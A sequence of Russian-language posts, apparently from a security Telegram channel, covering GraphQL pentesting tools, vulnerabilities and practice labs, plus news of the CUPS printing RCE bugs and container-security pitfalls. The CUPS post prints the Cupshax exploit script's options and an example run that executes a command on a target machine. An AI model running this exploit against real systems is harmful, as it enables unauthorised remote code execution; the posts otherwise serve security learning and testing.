Автоматизированный пентест GraphQL
#graphql #pentest

➡️GraphQL - это открытая технология для создания и взаимодействия с API. Она была создана в 2012 году как альтернативный подход к REST - архитектурному стилю, определяющему принципы взаимодействия клиента и сервера через HTTP-запросы, стандартизированные URL и форматы данных JSON и XML.

В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST.

➡️Основные преимущества GraphQL

▪️Не нужно создавать несколько REST-запросов. Чтобы извлечь данные, достаточно ввести один запрос.
▪️Не привязан к конкретной базе данных или механизму хранения.
▪️Используется целая система типов данных.

Более подробно можете ознакомиться в этом видео или в этой статье.

❤️ А теперь перейдём к самой вкусной части | Пентест GraphQL
Начнём с классики, это Hacktricks. Но это скучно)

Список тулз, которые рекомендуют в интернетах:
➡️graphw00f - тулза делает аудит на основе GraphQL Threat Matrix Project и после скана она выводит отчёт смапленный по этой матрице уязвимостей.
➡️InQL - довольно популярное расширение для BurpSuite, которое позволяет просканировать ендпоинты GraphQL, также можете загрузить json схему в него. Этот режим позволит собрать все эндпоинты в одну центролизованную кучку. Затем перекидываете конкретный эндпоинт во вкладку Attacker и там уже можете в ручном режиме изменять запрос.
➡️Куда же мы без ffuf и хорошего словаря для GraphQL
➡️GraphQL Cop - данная тулза подходит и для пентестеров, и для appsec/devsecops, т.к. очень легко заворачивается в CI/CD. Есть визуально красивый текстовый вывод в консоль, а есть Json вывод. Тулза обнаруживает атаки типа DOS, Раскрытие информации, CSRF. Но как говорится, где одна бага, там и вторая)
➡️Graphinder - добывает все graphql эндпоинты для конкретного домена
➡️GraphQLmap - интересный интерактивный режим. Пример работы
➡️Auto GraphQL Scanner - бурповское расширение по совету от Bo0om
➡️Два визуализатора схем GraphQL, GraphQL Voyager и GraphQL Online
➡️Уже все имплементировали nuclei в свои DAST, поэтому вот шаблон под детект GraphQL
➡️В случае если интроспекция выключена, используем Clairvoyance. Он соберёт для вас json схему.

⚠️ Типичные уязвимости для GraphQL

➡️DOS. GraphQL будут подвержены для этого типа атак, если нет ограничений на глубину запросов.
➡️Сбатченные (batched) запросы и алиасы. К примеру вы установили rate limit на ваши эндпоинты, НО если вы разрешили сбатченные запросы, то хахакер может впихнуть множество запросов в один и тем самым это приведет к DOS или к обходу рейтов.
➡️Некорректная или отсутствующая аутентификация и авторизация
➡️XSS
➡️Arbitrary File Upload & Path Traversal
➡️RCE

🛠 Лабы для тренировок

➡️Portswigger - не очень много тасков, нет прям сложных
➡️DVGA (Damn Vulnerable GraphQL Application) - самая популярная лаба
➡️vuln-graphql-api - малоизвестная лаба (сам ещё не раскатывал)

📌Почитать ещё

➡️Статья от ООО Бастион
➡️Pentesting GraphQL 101 Part 1 / 2 / 3
➡️GraphQL Pentesting for Dummies! Part- 1 / 2
➡️GraphQL Cheat Sheet
➡️Документация GraphQL

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек

Классическое ИБ афтерпати
#meme

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек

🐧 Cupshax - RCE через службу печати в UNIX
#unix #RCE #CVE

CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177

Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.

🛠 Изучить райтап ТУТ

Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.

➡️Использование

usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]

A script for executing commands remotely

options:
  -h, --help         show this help message and exit
  --name NAME        The name to use (default: RCE Printer)
  --ip IP            The IP address of the machine running this script
  --command COMMAND  The command to execute (default: 'touch /tmp/pwn')
  --port PORT        The port to connect on (default: 8631)

➡️Пример использования

python cupshax.py --name "Print to PDF (Color)" \
                  --command "id>/tmp/pwn" \
                  --ip 10.0.0.3

📱 Github и мой форк, на случай удаления репы

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек

Доклад про IOT от @crytech7
#iot

Начался раньше

🌚 @poxek

🖼️ Как собрать контейнер и не вооружить хакера
#docker #контейнер #k8s

Проблемы с безопасностью
Типичные проблемы, связанные с информационной безопасностью контейнеров:

Уязвимые компоненты. Когда вы деплоите и собираете контейнер с уязвимыми компонентами, то они никуда не денутся и всегда будут в нём присутствовать.

Ошибки конфигурации. Когда в среде выполнения контейнеров или в самих контейнерах допущены ошибки при конфигурировании, злоумышленник может этим воспользоваться.

Наличие root-пользователя в контейнере. Эта проблема может звучать немного по-детски. Но это бич многих компаний — часто у них запускаются продукты от привилегированного пользователя внутри контейнеров. Тоже запускаете свои приложения в контейнере под root’ом? Мы расскажем, почему так однозначно не стоит делать.

➡️Читать далее

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек